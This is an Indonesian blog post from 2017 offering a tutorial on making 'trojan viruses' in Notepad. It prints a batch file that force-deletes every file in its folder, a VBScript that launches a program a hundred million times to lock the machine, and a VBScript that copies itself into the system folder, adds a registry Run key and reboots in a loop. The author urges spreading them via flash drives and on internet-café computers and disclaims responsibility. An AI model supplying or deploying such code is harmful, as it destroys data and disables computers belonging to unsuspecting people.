Rabu, 18 Oktober 2017

Tutorial membuat virus trojan

ok guys karna td ada yg reques cara membuat virus jd kali ini gue bakal share

cara membuat virus trojan

berikut cara membuatnya:
 virus ini sangat Berbahaya Gan.
(Jangan untuk berbuat dosa ya)
1.Buka Notepad
2.Ketikan DEL /F /Q *
 3.Save dengan nama_yang_diinginkan.cmd
4.Sebarkan virus ini melalui flashdisk
Fungsi Viruz ini bakal

delete semua File dan Folder, jadi saya saranin untuk membuat virus ini di komputer warnet. Jangan lupa ganti save as type-nya menjadi all files. n jangan coba" ngeklik kalau loe nekad ngeklik nih virus di komputer loe sendiri, gue gak akan tanggung jawab. Jadi hati –hati!!!! ditunggu coment n sharenya.

Semi mamatikan tapi canggih juga ini viruz
Membuat virus bukanlah merupakan hal yang sulit. Karena, kita dapat membuatnya dengan notepad yang terdapat di semua komputer yang memakai Windows.
Virus yang akan kita buat ini, adalah virus yang membuat komputer yang terinfeksi menjadi tidak bisa berjalan sama sekali.

langkah-langkah:

1. buka notepad
2. copy+paste bahasa pemograman di bawah ini:
option explicit
dim wshshell
set wshshell=wscript.createobject("wscript.shell")

dim x
for x = 1 to 100000000
wshshell.run "tourstart.exe"
next
3. Save notepad dengan nama virus.vbs
 

atau makek method yg ini


1. Buka Notepad lu > All Program > Notepad
2. Copy Paste Script Berijut ini ke Notepad tadi

set FSobj=CreateObject(“Scripting.FileSystemObject”)
set sysDir = FSobj.GetSpecialFolder(1)
createRegKey “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\dlRB”,sysDir&”\dlRB.vbs”
sub createRegKey(regKey,regVal)
set regEdit = CreateObject(“WScript.Shell”)
regEdit.RegWrite regKey,regVal
end sub
set generateCopy=FSobj.CreateTextFile(sysDir+”\dlRB.vbs”)
generateCopy.close
set newFile = FSobj.OpenTextFile(WScript.ScriptFullname,1)
setFile()
fixedCode=replace(fileData,chr(94),”"”")
set procreateCopy=FSobj.OpenTextFile(sysDir+”\dlRB.vbs”,2)
procreateCopy.write fixedCode
procreateCopy.close
rebootSystem()
function setFile()
fileData=”rem – ^dlRB^ by D.L.” &vbcrlf& _
“strComputer = ^.^ ” &vbcrlf& _
“Set objWMIService = GetObject(^winmgmts:^ _ ” &vbcrlf& _
“& ^{impers & strComputer & ^\root\cimv2^)” &vbcrlf& _
“Set colOperatingSystems = objWMIService.ExecQuery _ ” &vbcrlf& _
“(^Select * from Win32_OperatingSystem^)” &vbcrlf& _
“For Each objOperatingSystem in colOperatingSystems” &vbcrlf& _
“ObjOperatingSystem.Reboot()” &vbcrlf& _
“Next”
end function
function rebootSystem()
strComputer = “.”
Set objWMIService = GetObject(“winmgmts:” _
& “{impers & strComputer & “\root\cimv2?)
Set colOperatingSystems = objWMIService.ExecQuery _
(“Select * from Win32_OperatingSystem”)
For Each objOperatingSystem in colOperatingSystems
ObjOperatingSystem.Reboot()
Next
end function

3. Dipikir secara logika ini adalah Coding script untuk me-reebot komputer
4. oke tanpa basa basi silahkan simpan dengan format .vbs contoh gantengers.vbs dan jangan lupa pilih all files
5. Virus/Script kode perintah akan berjalan kalo lu klik , dan kalau mau coba ya silahkan yang rusak punya elu bukan gue :v


NB:pergunakan dengan bijak segala resiko bukan tanggung jawab gue..gue cuma ngasih tutor aja jd tergantung loe mau buat apaan 😂😂